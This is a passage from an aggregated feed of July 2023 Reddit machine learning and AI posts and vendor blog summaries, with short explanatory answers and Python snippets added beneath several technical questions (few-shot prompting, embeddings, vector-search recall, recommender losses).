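This does not address the error-dependence caveat (a run of correlated large errors will produce a run of flags); CUSUM-style statistics on the residuals are the usual next step.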
    [D] How to actually do the final PPO with a reward model in RLHF?
    Hi, I want to get hands-on with the RLHF pipeline. I found an online reward model that can be potentially used https://huggingface.co/OpenAssistant/reward-model-deberta-v3-large-v2 One thing that's unclear is how can I use this model for fine-tuning something like GPTNeoX-20B? My end goal is currently just a one-shot answering model (not necessarily a chat) submitted by /u/Emergency_Apricot_77 [link] [comments]  ( 8 min )
    [D] is it always better to have more examples in few shot learning?
I'm working with Llama to use details from a string to generate a dictionary. Str = 'My name is Brian' Dict = {"name": "Brian"} I'm using a few-shot learning process, providing the model with examples to learn from. The model performs fairly okay, but it needs to be better. Is it always a good thing to add a lot of examples, like 100 string/dict pairs, for the model to learn from, or is this one of those things in stats/machine learning where the obvious isn't always the best choice lol? I'd appreciate any advice please. submitted by /u/brianomars1123 [link] [comments]  ( 9 min )
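More shots are not automatically better: each example consumes context window, and returns typically diminish (and can even reverse) past a point, so it is worth sweeping the shot count on a held-out set rather than assuming. A minimal helper for building k-shot prompts to run such a sweep (the format mirrors the post's Str/Dict convention; the helper name is made up):

```python
import json

def build_few_shot_prompt(examples, query, k):
    """Assemble a k-shot prompt from (text, dict) example pairs."""
    parts = []
    for text, d in examples[:k]:
        parts.append(f"Str = '{text}'\nDict = {json.dumps(d)}")
    parts.append(f"Str = '{query}'\nDict =")  # model completes this line
    return "\n\n".join(parts)

examples = [("My name is Brian", {"name": "Brian"}),
            ("My name is Dana", {"name": "Dana"})]
prompt = build_few_shot_prompt(examples, "My name is Alex", k=1)
```

Evaluating accuracy at k = 1, 5, 10, 25, ... on held-out pairs usually reveals the knee of the curve quickly; past that, curating diverse, hard examples tends to help more than adding volume.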
    [D] speaker recognition including unknown speaker(s)
Hi, I wanted to modify this speaker recognition (not speech recognition) example by Keras to recognize when an unknown speaker is speaking. So the network needs to be able to tell which of the speakers is talking, and if none of them is talking, it needs to say so. I don't mean silence (then it would be enough to train the network to recognize silence); I mean a speaker who is not in the training set. I think this problem can be extended to something like recognizing whether an image is not part of the MNIST dataset. submitted by /u/giggiox [link] [comments]  ( 9 min )
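A common open-set baseline for this is a rejection rule on top of the closed-set classifier: if no known speaker is predicted confidently enough, output "unknown". A minimal sketch over the classifier's logits (the threshold is arbitrary and should be tuned on held-out impostor audio):

```python
import numpy as np

def classify_with_reject(logits, threshold=0.7):
    """Open-set wrapper: return the predicted speaker index, or -1
    ("unknown") when the softmax confidence is below the threshold."""
    z = np.asarray(logits, dtype=float)
    e = np.exp(z - z.max())            # numerically stable softmax
    p = e / e.sum()
    return int(p.argmax()) if p.max() >= threshold else -1

print(classify_with_reject([8.0, 0.1, 0.2]))   # confident -> 0
print(classify_with_reject([1.0, 0.9, 1.1]))   # flat -> -1 (unknown)
```

A stronger approach (closer to how production systems handle this, analogous to out-of-distribution detection for the MNIST case) is to compare a speaker embedding of the audio against enrolled speakers' embeddings and reject when the best cosine similarity is too low.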
    [D] How do people track their machine learning models?
Hello! I'm curious to know how you guys currently track changes and general information for your ML/DL models. By changes, I'm referring to parameters, accuracy/loss, functions your model uses, training data etc across different versions of your models. By general changes, I'm referring to descriptions of what the model does, code changes, tags and so on. I'm under the impression most people are using MLflow, W&B etc, which I guess is fine, but I'm finding that these tools treat models as static files, as second-class citizens, which is annoying when I want to zero in on a model and understand what was changed and how, outside the context of an experiment. This gets really annoying when I'm looking at model version 134 created by Mike in the other team. Curious to know how people are tracking models and what they think generally about model tracking. Thanks! submitted by /u/bobskithememe [link] [comments]  ( 9 min )
    [R] How can I produce embeddings for text inputs from a pretrained transformer model?
If I have the model saved as a .ckpt file, what are the steps for extracting the embeddings for a text input? I'm trying to use a pretrained custom model but don't quite understand how to work with a transformer model file in .ckpt form. Would really appreciate any suggestions. submitted by /u/Urusander [link] [comments]  ( 8 min )
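If the .ckpt is a PyTorch Lightning-style checkpoint, the usual recipe (an assumption about this particular checkpoint) is: instantiate the model class, load the weights from the checkpoint's state dict, run a forward pass that returns hidden states, and pool the last hidden state over tokens. The pooling step, sketched in numpy with made-up stand-in tensors:

```python
import numpy as np

def mean_pool(last_hidden, attention_mask):
    """Mask-aware mean pooling of token vectors into one text embedding.
    last_hidden: (seq_len, dim) hidden states from the model's forward
    pass; attention_mask: (seq_len,) with 1 for real tokens, 0 for pad."""
    mask = np.asarray(attention_mask, dtype=float)[:, None]
    return (last_hidden * mask).sum(axis=0) / mask.sum()

# Padding tokens (mask 0) are excluded from the average.
h = np.array([[1.0, 2.0], [3.0, 4.0], [9.0, 9.0]])
emb = mean_pool(h, [1, 1, 0])   # -> [2.0, 3.0]
```

Which layer to pool (last hidden state, an earlier layer, or the CLS token) depends on the model; for sentence-similarity uses, mask-aware mean pooling of the last layer is a common default.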
    [D] Vector database benchmarking
Is there a way I can calculate the precision scores of a vector database? I need to benchmark Milvus and Elasticsearch on a custom dataset. Any help would be appreciated. submitted by /u/adiraat [link] [comments]  ( 8 min )
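For approximate vector search, the standard metric is recall@k against exact brute-force results on the same data, rather than precision in the classification sense. A numpy sketch (assumes you can export or re-embed the corpus to compute the exact ground truth):

```python
import numpy as np

def brute_force_topk(queries, corpus, k=10):
    """Exact cosine top-k neighbor ids, used as ground truth."""
    q = queries / np.linalg.norm(queries, axis=1, keepdims=True)
    c = corpus / np.linalg.norm(corpus, axis=1, keepdims=True)
    return np.argsort(-(q @ c.T), axis=1)[:, :k]

def recall_at_k(retrieved, ground_truth, k=10):
    """Mean fraction of the true top-k that the database returned.
    retrieved / ground_truth: per-query arrays of neighbor ids."""
    hits = [len(set(r[:k]) & set(g[:k])) / k
            for r, g in zip(retrieved, ground_truth)]
    return float(np.mean(hits))
```

Run the same queries through Milvus and Elasticsearch, collect the returned ids, and score each engine's results against the `brute_force_topk` ground truth; also record latency and throughput, since ANN engines trade recall for speed.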
    [P] Any good models on huggingface for specific text generation use case?
Hi, I was wondering if there are any lightweight models I can download from Hugging Face and fine-tune for my use case. I'm trying to build a model that takes a paragraph of data and certain instructions and outputs parts of the data in JSON format. submitted by /u/Right-Type-3210 [link] [comments]  ( 8 min )
    Transformers for Recommender Systems. [D]
I've been involved in a research project on session-based recommendation systems, where we have users' historical purchases and the goal is to predict the next item to be purchased. Given this, and assuming that we have somehow represented each item in a session as an embedding, these embeddings act as input to the transformer model and the output is an embedding of the next product. The training set has a few million sessions, each with both prior purchases of arbitrary length and the next item. So the transformer is trained with a supervised loss between the predicted and actual next-item embeddings. The problem I have been facing is that the loss saturates and there is not much learning over time. Any suggestions on how to improve this? I tried increasing the number of layers and did some hyperparameter tuning of the learning rate and weight decay, but similar behaviour is observed. submitted by /u/Acceptable-Mix-4534 [link] [comments]  ( 9 min )
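One thing worth checking when an embedding-regression loss plateaus is the loss itself: regressing directly onto the target embedding (e.g. with MSE) can collapse predictions toward an average item. A common alternative is a softmax over in-batch negatives, where each session must score its own next item above the other items in the batch. A numpy sketch of that loss (shapes and temperature are illustrative):

```python
import numpy as np

def in_batch_softmax_loss(pred, target, temperature=0.1):
    """Contrastive alternative to plain embedding regression: each
    predicted next-item embedding should score its own target higher
    than the other targets in the batch (in-batch negatives)."""
    p = pred / np.linalg.norm(pred, axis=1, keepdims=True)
    t = target / np.linalg.norm(target, axis=1, keepdims=True)
    logits = (p @ t.T) / temperature            # (batch, batch) sims
    logits -= logits.max(axis=1, keepdims=True)  # numerical stability
    log_probs = logits - np.log(np.exp(logits).sum(axis=1, keepdims=True))
    return float(-np.mean(np.diag(log_probs)))   # correct item on diagonal
```

Relative to MSE, this gives gradient signal about competing items rather than absolute coordinates, which is often what breaks the saturation; it is the loss behind most dual-encoder retrieval recommenders.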
    [R] generating datasets to better fine-tune LLMs
    https://github.com/discus-labs/discus submitted by /u/innovating_ai [link] [comments]  ( 8 min )
    [R] Monarch Mixer: Revisiting BERT, Without Attention or MLPs
    https://hazyresearch.stanford.edu/blog/2023-07-25-m2-bert submitted by /u/hzj5790 [link] [comments]  ( 8 min )

I love the arguments in this video about LLMs; physicist Sabine Hossenfelder nails it, in my opinion
    address the arguments made in this video submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
    Techno meets AI: StyleGAN2-ada interpolation video trained on spray art
    submitted by /u/intermorphmusic [link] [comments]  ( 8 min )
    AI picking the best spot to visit in the UK
    submitted by /u/Sharpchu [link] [comments]  ( 8 min )
    Does the bandit really need to be evil ?
    He's already a bandit... (zombie apoc rp) submitted by /u/loizo78 [link] [comments]  ( 8 min )
    Using AI to make profit
    Welcoming any ideas from the community. Blank slate here. How/where do I begin to use AI to make small (or any) amount of money. Starting from almost nothing. Thanks. submitted by /u/AdThin6400 [link] [comments]  ( 8 min )
    AI Policy @🤗: Open ML Considerations in the EU AI Act
    submitted by /u/ninjasaid13 [link] [comments]  ( 8 min )
    Apparently zombies deserve equal rights as humans (and are living creatures ??)
Seriously, when tf are we getting cloud-based models that don't require a 3090 or 4090 or some other overly expensive graphics card? I have a 3060 Ti and I still can't run shit on Faraday. When will we get uncensored cloud models? submitted by /u/loizo78 [link] [comments]  ( 8 min )
    Is there an AI tool for replacing text on an image?
    Is there any AI tool out there that lets me upload an image and let the AI edit the text on the image so that it says something else while doing it well and keeping the original font? submitted by /u/quetianepine [link] [comments]  ( 8 min )
    Cureus Conversations|S3 Ep 3| Salim Surani et.al.| AI in Critical Care: A Handy Tool
    submitted by /u/CureusJournal [link] [comments]  ( 8 min )
    Looking to play with AI audio tools
Hey, we all know about the AI songs released recently, which are basically vocal deepfakes. I'd like to know the tools used, if anyone knows. I'd like to feed one my own voice, even if it's a paid service; I'm interested in playing around with it. I've tried googling, but there's too much info and each source contradicts the other lol. Any info is appreciated. :) submitted by /u/GrandNOBLE [link] [comments]  ( 8 min )
    I have LOTS of recordings of vocalists from my music project and I'm interested in making voice models using these recordings to create harmonies and fix recording errors. What's the best way I can go about this?
I really like the SpongeBob AI stuff made with RVC-2, but I've only used the funny voice models; I haven't tried making my own. I want to experiment with this, but I haven't looked into it yet because I'm wondering if there is something better out there for what I'm trying to do. I like the RVC one because I can sing my parts and swap them to any other voice, which is what I'd like to do (no text-to-voice stuff). Also, I know the training data for a lot of these voice models comes from the TV show and other clean recordings, which are compressed and equalized properly. However, I'd like to train the AI on raw, uncompressed WAV files that generally have a lot of headroom and dynamic range (though this varies a lot). It's OK if the output sounds similar as a result, because I want to apply compression and EQ after the fact anyway. But if this would affect training, I'd be willing to scrape through all these voice recordings and process them for loudness and clarity beforehand so the model does better. Anyway, any guidance would be greatly appreciated because I'm new to AI. I have basic dev experience (no AI stuff) and I'm mostly skilled in music production, but I would love to have a tool like this in my arsenal. If there's anywhere else I can post about this, I'd like to know too. Thanks! submitted by /u/Dr_lawlz [link] [comments]  ( 9 min )
    Morality in AI Companions
    We’re getting closer and closer to more believable and realistic AI interpersonal interaction. We already have Character.AI and other platforms for creating and interacting with personalized AIs. Some will use/view them as emotional partners, and one day the hardware will be good enough that we can begin making believable bodies for them. One of the complaints I’ve seen from ordinary people about “waifus” is that they are often times created in a way that ordinary people would not find natural in a “real” human being. Examples being people who have trouble dating “real” people could just buy an AI girlfriend or boyfriend who is considered “beautiful” or “handsome” that is designed to be subservient to their owner in ways that ordinary people feel a “real” person would not otherwise wish to be. The idea being that "weeaboo neckbeards will buy a Japanese AI girlfriend who looks 14 and she will be coded to worship the ground he walks on despite that he's an unwashed incel". What do you think society's/the government's views and roles will mean for these AI companions? Do you think anyone will be able to force "AI morality", like an angry feminist being mad that an "incel" has created a female being who shows no desire for feminist ideals and is "happy" to be at her owner's beck and call in whatever way he wants? I guess this is sort of related to MGTOW, or Men Going Their Own Way, being able to create the partners they want, in whatever way they want. Do you feel that "once I own it, I can do whatever I want with it" should apply in its entirety? What about people "hacking" their AI to remove any supposed "morality programming" so they can make their AI waifu act however they want? We've seen with movies like Bicentennial Man, where people push to give these kinds of AIs 'personhood' and the same rights as human citizens. How do others feel about this issue? submitted by /u/ZephyrBrightmoon [link] [comments]  ( 9 min )
    Excuse me??? LOL...
    submitted by /u/the_anonymizer [link] [comments]  ( 8 min )
    Are there any entities/organizations working on the self-regulation of AI technology?
    I am curious if there are any efforts among AI technologists to self-regulate, in the way that for example, the advertising industry in the US self-regulates via the IAB? submitted by /u/Winter_Addition [link] [comments]  ( 8 min )
    Five Important AI Programming Languages - Python, C++, R, MATLAB, and Java
    submitted by /u/Tao_Dragon [link] [comments]  ( 8 min )
    The AI-Powered, Totally Autonomous Future of War Is Here
    submitted by /u/Alone-Competition-77 [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/25/2023
Ridgelinez (Tokyo) is a subsidiary of Fujitsu in Japan that announced the development of a generative artificial intelligence (AI) system capable of engaging in voice communication with humans. The applications of this system include assisting companies in conducting meetings or providing career planning advice to employees.[1] BMW has revealed that artificial intelligence is already allowing it to cut costs at its sprawling factory in Spartanburg, South Carolina. The AI system has allowed BMW to remove six workers from the line and deploy them to other jobs. The tool is already saving the company over $1 million a year.[2] MIT's 'PhotoGuard' protects your images from malicious AI edits. The technique introduces nearly invisible "perturbations" to throw off algorithmic models.[3] Microsoft, with its TypeChat library, seeks to enable easy development of natural language interfaces for large language models (LLMs) using types. Introduced July 20 by a team including C# and TypeScript lead developer Anders Hejlsberg, a Microsoft Technical Fellow, TypeChat addresses the difficulty of developing natural language interfaces where apps rely on complex decision trees to determine intent and gather the input needed to act.[4] Sources: [1] https://www.ridgelinez.com/ [2] https://www.carscoops.com/2023/07/bmw-is-using-ai-to-cut-production-costs-at-spartanburg-plant/ [3] https://www.engadget.com/mits-photoguard-protects-your-images-from-malicious-ai-edits-213036912.html [4] https://playcrazygame.com/singapore/2023/07/24/microsoft-unveils-typechat-library-for-building-natural-language-interfaces/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Snapchat discovery page filled with fake ai news stories
You watch some of these videos and the quality and jitteriness around the body is so bad you can clearly tell it's AI-generated. How are people not picking up on it? They're fake news stories made to get clicks. It's like they use a deepfake on a video and put whoever they want on top of it to make a video. But hey, most people using Snapchat aren't smart enough to see this, and the people watching them are dumb kids and teenagers who believe everything they see. submitted by /u/missmyniwwa911 [link] [comments]  ( 8 min )
    OpenAI launches Android version of its ChatGPT app
Two months after bringing ChatGPT to iOS, OpenAI LP today launched an Android version of its artificial intelligence assistant. The Android app is currently accessible to users in the U.S., India, Bangladesh and Brazil. OpenAI will extend availability to additional countries over the next week. The iOS version was available for download in more than 150 countries as of late May. submitted by /u/Tiger_Claw_1 [link] [comments]  ( 8 min )
    AI Unlocks Olive Oil's Potential in Alzheimer's Battle
    submitted by /u/Alone-Competition-77 [link] [comments]  ( 8 min )

    Use Stable Diffusion XL with Amazon SageMaker JumpStart in Amazon SageMaker Studio
    Today we are excited to announce that Stable Diffusion XL 1.0 (SDXL 1.0) is available for customers through Amazon SageMaker JumpStart. SDXL 1.0 is the latest image generation model from Stability AI. SDXL 1.0 enhancements include native 1024-pixel image generation at a variety of aspect ratios. It’s designed for professional use, and calibrated for high-resolution […]  ( 12 min )
    Flag harmful language in spoken conversations with Amazon Transcribe Toxicity Detection
    The increase in online social activities such as social networking or online gaming is often riddled with hostile or aggressive behavior that can lead to unsolicited manifestations of hate speech, cyberbullying, or harassment. For example, many online gaming communities offer voice chat functionality to facilitate communication among their users. Although voice chat often supports friendly […]  ( 8 min )
    Maximize Stable Diffusion performance and lower inference costs with AWS Inferentia2
    Generative AI models have been experiencing rapid growth in recent months due to its impressive capabilities in creating realistic text, images, code, and audio. Among these models, Stable Diffusion models stand out for their unique strength in creating high-quality images based on text prompts. Stable Diffusion can generate a wide variety of high-quality images, including […]  ( 12 min )
    AWS offers new artificial intelligence, machine learning, and generative AI guides to plan your AI strategy
Breakthroughs in artificial intelligence (AI) and machine learning (ML) have been in the headlines for months—and for good reason. The emerging and evolving capabilities of this technology promise new business opportunities for customers across all sectors and industries. But the speed of this revolution has made it harder for organizations and consumers to assess what […]  ( 6 min )
    New technical deep dive course: Generative AI Foundations on AWS
    Generative AI Foundations on AWS is a new technical deep dive course that gives you the conceptual fundamentals, practical advice, and hands-on guidance to pre-train, fine-tune, and deploy state-of-the-art foundation models on AWS and beyond. Developed by AWS generative AI worldwide foundations lead Emily Webber, this free hands-on course and the supporting GitHub source code […]  ( 6 min )
    AWS Reaffirms its Commitment to Responsible Generative AI
    As a pioneer in artificial intelligence and machine learning, AWS is committed to developing and deploying generative AI responsibly As one of the most transformational innovations of our time, generative AI continues to capture the world’s imagination, and we remain as committed as ever to harnessing it responsibly. With a team of dedicated responsible AI […]  ( 5 min )

    NVIDIA H100 GPUs Now Available on AWS Cloud
    AWS users can now access the leading performance demonstrated in industry benchmarks of AI training and inference. The cloud giant officially switched on a new Amazon EC2 P5 instance powered by NVIDIA H100 Tensor Core GPUs. The service lets users scale generative AI, high performance computing (HPC) and other applications with a click from a Read article >  ( 6 min )
    Codeium’s Varun Mohan and Jeff Wang on Unleashing the Power of AI in Software Development
    The world increasingly runs on code. Accelerating the work of those who create that code will boost their productivity — and that’s just what AI startup Codeium, a member of NVIDIA’s Inception program for startups, aims to do. On the latest episode of NVIDIA’s AI Podcast, host Noah Kravitz interviewed Codeium founder and CEO Varun Read article >  ( 5 min )
  • Open

    Multi-heads DQN with prioritized buffer replay
    Hello everyone, I really need your help, guys. Is the code (uploaded at https://pastebin.com/LgB3hM47) for training a 2-head DQN correct? Moreover, how can I modify the code to suit a 2-head DQN with a prioritized replay buffer, such that the action is a 2-element list? Thank you in advance. submitted by /u/GuavaAgreeable208 [link] [comments]  ( 8 min )
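    For reference, the core of a 2-head DQN is a shared trunk feeding two separate Q-value outputs, one per action component. A minimal NumPy sketch (layer sizes are illustrative, not taken from the poster's code):

```python
import numpy as np

def two_head_q(obs, W_trunk, W_head1, W_head2):
    """Shared ReLU trunk feeding two Q-value heads, one per
    element of a 2-element action list. Each head is argmax'd
    independently to pick its action component."""
    h = np.maximum(obs @ W_trunk, 0.0)  # shared features
    return h @ W_head1, h @ W_head2     # per-head Q-values
```

    The TD loss is then the sum (or mean) of the per-head TD errors, which is also the natural quantity for a prioritized buffer to derive its priorities from.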
    Is there a way to control the epsilon decay in Stable-Baselines3?
    I am looking at the docs for DQN in SB3. I see the following hyper-parameters for controlling exploration: `exploration_fraction`, `exploration_initial_eps`, and `exploration_final_eps`. But I don't think I can control the decaying of epsilon with them. Could someone please help with this issue? submitted by /u/Academic-Rent7800 [link] [comments]  ( 8 min )
    Presenting SimplePyDash: Real-Time Data Plotting Made Simple!
    Hey all! I'm excited to share SimplePyDash, a new tool I've developed for real-time data visualization. It's a versatile, browser-based dashboard designed to make data plotting as straightforward as possible! I thought about posting this here because it started as a project to monitor agents' behaviour in an OpenAI Gym environment, but it can be used for all sorts of things! Whether you're monitoring an OpenAI Gym environment, plotting your latest ML model's performance, or just need a flexible way to stream data, SimplePyDash has got you covered. With a clean, column-based layout and a set of intuitive default widgets, you can create your own custom dashboard in no time. Installing is as easy as running pip install simple-pydash, and there are several example scripts in the repo to help get you started. Check out the GitHub Repository for more details. If you like it, leave a star and feel free to share your feedback or questions. Thanks for checking it out! submitted by /u/vaaal88 [link] [comments]  ( 9 min )
  • Open

    In search of a generalizable method for source-free domain adaptation
    Posted by Eleni Triantafillou, Research Scientist, and Malik Boudiaf, Student Researcher, Google Deep learning has recently made tremendous progress in a wide range of problems and applications, but models often fail unpredictably when deployed in unseen domains or distributions. Source-free domain adaptation (SFDA) is an area of research that aims to design methods for adapting a pre-trained model (trained on a “source domain”) to a new “target domain”, using only unlabeled data from the latter. Designing adaptation methods for deep models is an important area of research. While the increasing scale of models and training datasets has been a key ingredient to their success, a negative consequence of this trend is that training such models is increasingly computationally expe…  ( 93 min )
  • Open

    Trouble setting up Neural Network
    Hi there, I'm struggling a bit to set up a neural network with the data I've collected. These are some of the errors I'm getting. Any tips or help to fix it please? submitted by /u/LesgoLeggo [link] [comments]  ( 8 min )
  • Open

    Jaccard index and jazz albums
    Jaccard index is a way of measuring the similarity of sets. The Jaccard index, or Jaccard similarity coefficient, of two sets A and B is the number of elements in their intersection, A ∩ B, divided by the number of elements in their union, A ∪ B. Jaccard similarity is a robust way to compare […] Jaccard index and jazz albums first appeared on John D. Cook.  ( 5 min )
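    The definition fits in a few lines of code (a small sketch; the empty-set convention here is my own assumption, not from the post):

```python
def jaccard(a, b):
    """Jaccard similarity of two sets: |A ∩ B| / |A ∪ B|."""
    a, b = set(a), set(b)
    if not a and not b:
        return 1.0  # convention: two empty sets count as identical
    return len(a & b) / len(a | b)
```

    Two albums sharing 2 tracks out of 4 distinct tracks overall score 0.5, and 1 − jaccard(A, B) is a proper distance metric.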
  • Open

    Frontier Model Forum
    We’re forming a new industry body to promote the safe and responsible development of frontier AI systems: advancing AI safety research, identifying best practices and standards, and facilitating information sharing among policymakers and industry.  ( 4 min )
  • Open

    A simpler method for learning to control a robot
    Researchers develop a machine-learning technique that can efficiently learn to control a robot, leading to better performance with fewer data.  ( 10 min )

  • Open

    Yesterday, we were having a discussion about synthetically generated video. Well, I'm back as promised, and with a very interesting result. Check it out! Details in comments.
    submitted by /u/otherworlderotic [link] [comments]  ( 8 min )
    About Singing Ai?
    Is it possible to have AI come up with generated lyrics and sing them within a given BPM and root note? Does this exist? I'd like to know where and how. AI is interesting. submitted by /u/Office_Flashy [link] [comments]  ( 8 min )
    Oversight of A.I.: Principles for Regulation | United States Senate Committee on the Judiciary - with Anthropic CEO
    submitted by /u/jaketocake [link] [comments]  ( 8 min )
    AI alignment proposal: Supplementary Alignment Insights Through a Highly Controlled Shutdown Incentive — LessWrong
    submitted by /u/RamazanBlack [link] [comments]  ( 8 min )
    AI presidential debate
    Hilarious, comedic effort of an AI presidential debate going on now. https://www.twitch.tv/trumporbiden2024 submitted by /u/Smash_Factor [link] [comments]  ( 8 min )
    The White House Already Knows How to Make AI Safer
    submitted by /u/trueslicky [link] [comments]  ( 8 min )
    Utilizing AI With Neutral Global Oversight for Business & Society
    submitted by /u/citidotio [link] [comments]  ( 8 min )
    If Deadpool 3 Was Written By AI
    Story by AI, Voiced by AI, Art by AI submitted by /u/realzackmcfarlin [link] [comments]  ( 8 min )
    They offer a Tesla to their biggest customers :o
    The company is named Eden AI, and they are currently doing their Product Hunt launch. They let users call AI APIs from all the major AI companies (Google, AWS, OpenAI, Microsoft, and all the specialized companies). They recently added this rewards progress bar to their billing page; funny marketing operation! submitted by /u/JerLam2762 [link] [comments]  ( 8 min )
    Intel Seeks To Win Over AI Developers With Open-Source Reference Kits
    submitted by /u/reps_up [link] [comments]  ( 8 min )
    (Spiderman washing cloth) Ai is insane
    submitted by /u/Unlikely_Gap_5065 [link] [comments]  ( 8 min )
    Understanding OpenAI's past, current, and upcoming model releases
    I found it a bit hard to follow OpenAI's public releases - sometimes they just announce a model is coming without giving a date, sometimes they announce model deprecations and it's hard to understand whether we should use those models in production or not. I am a visual thinker so putting everything in a single image made sense to me. Check it out below, and if you have any questions or suggestions, please let me know! submitted by /u/EscapedLaughter [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/24/2023
    In a study published earlier this month, scientists at Rice and Stanford University concluded that training AI models exclusively on the outputs of generative AI is not a good idea. They titled their report: “Self-consuming generative models go MAD (Model Autophagy Disorder)”.[1] To enhance SQL query building, Lasse, a seasoned full-stack developer, has recently released AIHelperBot. This powerful tool enables individuals and businesses to write SQL queries efficiently, enhance productivity, and learn new SQL techniques.[2] Japan’s Ministry of Economy, Trade, and Industry (METI) has announced its plans to develop a new supercomputer to help advance the country’s artificial intelligence (AI) industry. The new supercomputer (SC) will be operated by the National Institute of Advanced Industrial Science and Technology (AIST).[3] Google co-founder Sergey Brin is back in the company’s office working directly with members of the artificial intelligence team.[4] Sources: [1] https://www.cdotrends.com/story/18288/training-ai-outputs-generative-ai-mad [2] https://dtgreviews.com/ai/meet-aihelperbot-an-artificial-intelligence-ai-based-sql-expert-that-builds-sql-queries-in-seconds/126512/ [3] https://www.gizchina.com/2023/07/24/japan-ministry-develop-supercomputer-ai-industries/ [4] https://www.wsj.com/video/series/tech-news-briefing/google-co-founder-returns-to-help-with-ai-efforts/27CE8E53-C8D8-4D93-8FA1-5E2C465092CB submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
  • Open

    Web Content Embedding Transformer lambda function [Project]
    Hi all! I'd like to share a simple, straightforward Web Content Embedding Transformer lambda function to create and store embeddings of web content. This is a Lambda function that scrapes for URLs, then uses those URLs to scrape page content, which it splits into chunks and transforms into embeddings using OpenAI. It then stores the embeddings, including metadata, in your Pinecone DB. You can then use the embeddings for custom chatbots, etc. Here's a link to a public repo: https://github.com/i-dream-of-ai/lambda-webpage-vector-store Pull requests welcome! Please star the repo if you like it or use it! submitted by /u/Jealous_Buyer [link] [comments]  ( 9 min )
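    The split-into-chunks step described above can be sketched as a sliding window (the sizes here are illustrative defaults, not taken from the repo):

```python
def chunk_text(text, chunk_size=1000, overlap=100):
    """Split page content into overlapping chunks before sending
    each chunk to an embedding API. The overlap keeps sentences
    that straddle a boundary visible to both neighboring chunks."""
    chunks, start = [], 0
    while start < len(text):
        chunks.append(text[start:start + chunk_size])
        start += chunk_size - overlap
    return chunks
```

    Each chunk is then embedded separately and stored alongside its source URL as metadata, so retrieval can cite the originating page.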
    Deep learning for Regression and Target scaling [D]
    I tried scaling the target variable to the range (0, 1) and trained the model using a sigmoid in the last layer. But when the predictions on the test set are rescaled back, the errors are too high. What can be done? Do I need to scale in the first place? Also, please answer this general question: how do I get a deep learning model to work well on regression tasks? submitted by /u/Charming-Witness-286 [link] [comments]  ( 8 min )
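    One thing worth verifying first is that the scale/inverse-scale round trip itself is exact; a plain NumPy stand-in for sklearn's MinMaxScaler makes that easy to check (a sketch, not the poster's pipeline):

```python
import numpy as np

class TargetScaler:
    """Min-max scale a regression target to [0, 1] and invert
    predictions back to the original units."""
    def fit(self, y):
        self.lo, self.hi = float(y.min()), float(y.max())
        return self

    def transform(self, y):
        return (y - self.lo) / (self.hi - self.lo)

    def inverse_transform(self, y_scaled):
        return y_scaled * (self.hi - self.lo) + self.lo
```

    If the round trip is exact, the large test error is a modeling issue rather than a scaling bug; a common culprit is the sigmoid output saturating near 0 and 1, which is why a linear output layer with standardized (zero-mean, unit-variance) targets is often the safer default for regression.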
    [P] Free/Low cost inference endpoint
    I want to create a small project as hobby in which the web app posts some user data to an endpoint hosting a model that returns its predictions. So I was wondering if there’s a platform that hosts models for free for hobbists? The idea is to build a simple portfolio project just to display to recruiters. submitted by /u/OkYak2915 [link] [comments]  ( 8 min )
    Aaron Parisi (Google DeepMind) will join the open AI4Code reading group this Thursday (July 27th) to talk about his latest research [R]
    Hi AI enthusiasts! This Thursday Aaron Parisi, Google DeepMind researcher, will join us to present and discuss his recent work as the lead author of TALM, a framework for augmenting language models with arbitrary tools. Free RSVP: https://lu.ma/mw5ppi46 Paper: https://arxiv.org/abs/2205.12255 🗓 July 27th (Thursday) at 17:00 GMT+1 📍 Zoom 👥 Members of the international AI4Code research community Hope to see you there! The AI4Code meetup community consists of like-minded researchers from around the world that network, discuss and share their latest research on AI applications on source code. submitted by /u/dritsakon [link] [comments]  ( 9 min )
    [Project] Quality Assurance platform for Machine Learning models
    Hello world 👋 We're developing an open-source & collaborative testing framework for ML models, from tabular to LLMs: https://github.com/Giskard-AI/giskard Testing Machine Learning applications can be tedious. Since ML models depend on data, testing scenarios depend on the domain specificities and are often infinite. Where to start testing? Which tests to implement? What issues to cover? How to implement the tests? At Giskard, we believe that Machine Learning needs its own testing framework. Created by ML engineers for ML engineers, Giskard contains 2 components: The Giskard Python library helps data scientists detect hidden vulnerabilities in ML models. It makes the AI development process more efficient, by automating the identification of risks of biases, performance issues and errors. To try it, see this documentation: https://docs.giskard.ai/en/latest/guides/scan/index.html The Giskard server helps ML engineers debug & monitor models, share dashboards, and collaborate. It makes the deployment of new ML models safer and more efficient, by providing ready-made monitoring dashboards, catalogs of re-usable testing components, and ML debugging interfaces. To try it, see this documentation: https://docs.giskard.ai/en/latest/guides/installation_app/index.html We released our v2 in Beta last month, and we're very interested in your feedback as QA engineers! submitted by /u/alteralec [link] [comments]  ( 9 min )
    [R] Towards provably efficient quantum algorithms for large-scale machine-learning models
    https://arxiv.org/abs/2303.03428 ​ If you're interested in trying out quantum machine learning on NVIDIA A100s or V100s with cuquantum and pennylane GPUs for free please fill out the following form submitted by /u/Neu3ral [link] [comments]  ( 8 min )
    Fixed size 1D sequence to fixed size 2D sequence prediction.[p]
    Hello everyone, I have a problem where I have a 1D sequence of 3 numbers, like [1, 50, 500], with 35 distinct combinations. I need to map it to a 2D sequence of numbers of length 1024, like this: [[23.78, 234, 13, …], [234, 76.9, 763, …]], where each row has 1024 elements. Is it possible in ML to do so? The 2D sequence can be paired (it can be represented as an image). Thank you very much! submitted by /u/Beginner4ever [link] [comments]  ( 9 min )
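    Worth noting: with only 35 distinct input triples, if you never need to generalize to unseen triples, the mapping does not require a learned model at all; a lookup table keyed on the triple reproduces the targets exactly (a sketch under that assumption):

```python
import numpy as np

def fit_lookup(inputs, targets):
    """Memorize the mapping from each distinct 3-number input to
    its 2 x 1024 target. A neural network only earns its keep if
    unseen input triples must be handled."""
    return {tuple(x): np.asarray(y) for x, y in zip(inputs, targets)}
```

    If generalization to new triples is required, a small MLP regressing 3 inputs to a flattened 2 × 1024 output is the standard setup.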
    [D] What datasets do you dream of having for your ML/NLP project(s)?
    Acquiring data to build models can truly be a pain. I am curious to know about the datasets you folks are looking for, to the extent that you would even consider paying for them or sacrifice your newborn baby. By extension, tell us about the project(s) you've been working on and how the data would help! submitted by /u/nobilis_rex_ [link] [comments]  ( 8 min )
    [D] Tool for ML/AI Sorting for 50,000 iCloud Photos into 300+ categories
